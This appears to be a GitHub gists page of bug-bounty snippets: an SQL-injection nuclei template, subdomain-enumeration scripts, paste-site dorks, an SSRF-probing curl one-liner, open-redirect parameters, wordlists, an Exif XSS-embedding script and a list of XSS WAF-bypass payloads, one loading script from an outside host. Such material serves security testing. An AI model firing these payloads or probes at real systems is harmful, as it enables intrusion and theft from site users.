0xbloody’s gists

KathanP19 / sqli2.yaml

Created January 2, 2021 02:30 — forked from 0x240x23elu/sqli2.yaml

Basic SQL Injection Detections nuclei Template

	id: SQLInjection_ERROR

	info:
	name: SQLINJECTION Detection
	author: 0x240x23elu & OFJAAAH
	severity: High

	requests:
	- method: GET

KathanP19 / sub.sh

Last active April 15, 2024 18:43

simple bash script

	#!/bin/bash

	echo -e "\e[32mRunning Findomain on $1 \e[0m";
	findomain -t $1 -u domain_$1.txt

	echo -e "\e[32m Running assetfinder on $1 \e[0m";
	assetfinder --subs-only $1 >> domain_$1.txt

	echo -e "\e[32mRunning Subfinder on $1 \e[0m";
	subfinder -d $1 -silent >> domain_$1.txt

KathanP19 / bbhtv2.sh

Last active April 15, 2024 18:40

	#!/bin/bash

	RED=$(tput setaf 1)
	GREEN=$(tput setaf 2)
	BLUE=$(tput setaf 4)
	RESET=$(tput sgr0)

	AMASS_VERSION=3.8.2

KathanP19 / googledork1

Created November 25, 2020 03:19 — forked from TvMpt/googledork1

"example.com" site:bitpaste.app | site:codebeautify.org | site:codepad.org | site:codepen.io | site:codeshare.io | site:dartpad.dartlang.org | site:dotnetfiddle.net | site:dpaste.com | site:dpaste.org | site:dumpz.org | site:gitlab.com | site:hastebin.com | site:heypasteit.com | site:ide.codingblocks.com | site:ide.geeksforgeeks.org | site:ideone.com | site:jsbin.com | site:jsfiddle.net | site:jsitor.com | site:justpaste.it | site:paste.debian.net | site:paste.fedoraproject.org | site:paste.frubar.net | site:paste.lisp.org | site:paste.opensuse.org | site:paste.org | site:paste.org.ru | site:paste.pound-python.org | site:paste.ubuntu.com | site:paste.xinu.at | site:paste2.org | site:pastebin.com | site:pastebin.fr | site:pastehtml.com | site:phpfiddle.org | site:play.golang.org | site:repl.it | site:rextester.com | site:slexy.org | site:snipplr.com | site:snipt.net | site:stackoverflow.com | site:textsnip.com | site:trello.com | site:trello.com  | site:try.ceylon-lang.org

KathanP19 / Ssrf

Created November 24, 2020 15:24 — forked from pikpikcu/Ssrf

curl -s "http://web.archive.org/cdx/search/cdx?url=*.domain/*&output=txt&fl=original&collapse=urlkey&page=/" | gf ssrf | qsreplace  "https://localtest.me" |  parallel -j50 -q curl -i -s -k -o >(grep -io "<title>[^<]*" | cut -d'>' -f2-) --silent --max-time 2 --write-out 'Status:%{http_code}\t Header-size:%{size_header}tUrl:%{url_effective} || '

ricsirigu / redirect_dorks.txt

Created November 1, 2020 19:48

Open Redirect Dorks

	Open Redirect Dorks

	/{payload}
	?next={payload}
	?url={payload}
	?target={payload}
	?rurl={payload}
	?dest={payload}
	?destination={payload}
	?redir={payload}

vijay922 / wordlist.txt

Last active April 28, 2025 13:13

	_
	..;/
	@
	0
	00
	01
	02
	03
	04
	05

RajChowdhury240 / XSS Payloads (WAF Bypass)

Created June 13, 2020 10:57

	';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
	'';!--"<XSS>=&{()}
	0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
	<script/src=data:,alert()>
	<marquee/onstart=alert()>
	<video/poster/onerror=alert()>
	<isindex/autofocus/onfocus=alert()>
	<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
	<IMG SRC="javascript:alert('XSS');">
	<IMG SRC=javascript:alert('XSS')>

hash3liZer / exifxss.py

Created June 5, 2020 11:02

Embedding XSS payloads in the Exif Metadata fields of and image

	import sys
	import subprocess

	exifs = [
	"ImageDescription",
	"Make",
	"Model",
	"Software",
	"Artist",
	"Copyright",

random-robbie / wordlist.txt

Created May 19, 2020 12:56

bruteforce wordlist for bug bountys

This file has been truncated, but you can view the full file.

	20-ev-allgemein
	20-years
	200
	2000
	20000719
	2001
	2001cc
	2002
	2003
	2004